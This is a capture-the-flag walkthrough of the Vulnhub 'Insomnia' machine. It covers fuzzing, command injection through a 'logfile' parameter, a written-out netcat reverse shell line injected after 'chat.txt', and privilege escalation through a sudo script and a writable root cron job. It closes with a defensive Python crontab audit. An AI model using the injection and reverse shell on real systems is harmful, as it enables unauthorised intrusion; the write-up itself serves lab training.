Insomnia Vulnhub Writeup (First blood)

3 min read, Mar 6, 2021

Difficulty: Easy/Medium (In my opinion)

NMAP:

Nice, port 8080 is open, so let’s browse it.

As we can see there is a chat, but we can’t do anything with it, so we use dirb to brute-force directories.

DIRB:

OK, we found the directory “administration.php” and some others, but those are rabbit holes, so let’s browse this one.

Nice, “Your activity has been logged”, but we can do nothing here, so let’s fuzz for parameters.

ARJUN:

We found the parameter “logfile”, so can we do an LFI? Mmmh, no! It doesn’t work, but we can do command injection, and the result appears directly in the chat!

COMMAND INJECTION:

And

Some files appear! Nice, we notice that commands can be executed after “chat.txt”, so

And

Wow! www-data, so let’s go for the reverse shell!

Command: chat.txt; nc IP PORT -e /bin/bash (and start the listener first!)

HORIZONTAL PRIVILEGE ESCALATION:

sudo -l

Nice, “start.sh” runs with user “julia”’s privileges, so add /bin/bash to that script.

Nice!!!

VERTICAL PRIVILEGE ESCALATION:

Initially we do not notice anything interesting, but if we look in /etc/crontab we notice a file that runs periodically on the system, so we can exploit it.

For convenience I use pspy64, which shows me the processes that are running on the system, to understand how often it is executed.

Now put pspy64 on the target in the /tmp directory, make it executable with “chmod +x pspy64” and run it with ./pspy64

And run now!

As we can see, the “check.sh” script runs every minute, and we also notice that it is a writable file! So let’s add our reverse shell payload to it.

Just listen on port 4444, wait, and…

WE ARE ROOT!
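On the defensive side, here is an added example (my own code, not part of the original writeup or of the box) that audits a system crontab for exactly the weakness used above: a job that runs as root but executes a script that other users can write to. The crontab text and the file modes are constructed samples, and make_stat_fn stands in for os.stat so the audit runs offline; with the default os.stat, audit_crontab checks the real files on the host.

```python
import os
import re
import stat
from typing import Callable, Dict, List, Tuple
# Constructed /etc/crontab-style sample (m h dom mon dow user command); not the box's real file.
SAMPLE_CRONTAB = """
17 *    * * *   root    run-parts --report /etc/cron.hourly
* * * * *       root    /home/julia/check.sh
*/5 * * * *     root    /usr/local/bin/backup.sh --quiet
"""
SAMPLE_FS = {  # constructed {path: (st_mode, st_uid)} state for the paths above
    "/etc/cron.hourly": (stat.S_IFDIR | 0o755, 0),
    "/home/julia/check.sh": (stat.S_IFREG | 0o777, 1001),  # julia's script, world-writable
    "/usr/local/bin/backup.sh": (stat.S_IFREG | 0o755, 0),
}
_CRON_LINE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

def audit_crontab(text: str, stat_fn: Callable[[str], os.stat_result] = os.stat) -> List[Tuple[str, str]]:
    """Return (path, reason) for every root cron job whose script a non-root user could modify."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        m = _CRON_LINE.match(line)
        if not m or m.group("user") != "root":
            continue  # only root jobs hand a root shell to whoever edits the script
        # Absolute paths in the command, split on whitespace and shell operators.
        for path in (t for t in re.split(r"[\s;&|]+", m.group("cmd")) if t.startswith("/")):
            try:
                st = stat_fn(path)
            except OSError:
                findings.append((path, "missing (hijackable if its directory is writable)"))
                continue
            if not stat.S_ISREG(st.st_mode):
                continue  # directories such as /etc/cron.hourly are out of scope here
            mode = stat.S_IMODE(st.st_mode)
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, f"group/world-writable ({mode:o})"))
            elif st.st_uid != 0:
                findings.append((path, f"owned by uid {st.st_uid}, not root"))
    return findings

def make_stat_fn(table: Dict[str, tuple]) -> Callable[[str], os.stat_result]:
    """os.stat stand-in backed by a {path: (mode, uid)} table, so the audit runs offline."""
    def fake_stat(path: str) -> os.stat_result:
        if path not in table:
            raise FileNotFoundError(path)
        return os.stat_result((table[path][0], 0, 0, 1, table[path][1], 0, 0, 0, 0, 0))
    return fake_stat
```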

Thank you everyone, I hope this is useful!

-0xJin

Written by N0t0d4y

CPTS | OSCP | OSWP | eCPTX | eWPTX | C|EH Master | CompTIA Security + | eJPT | CISM |
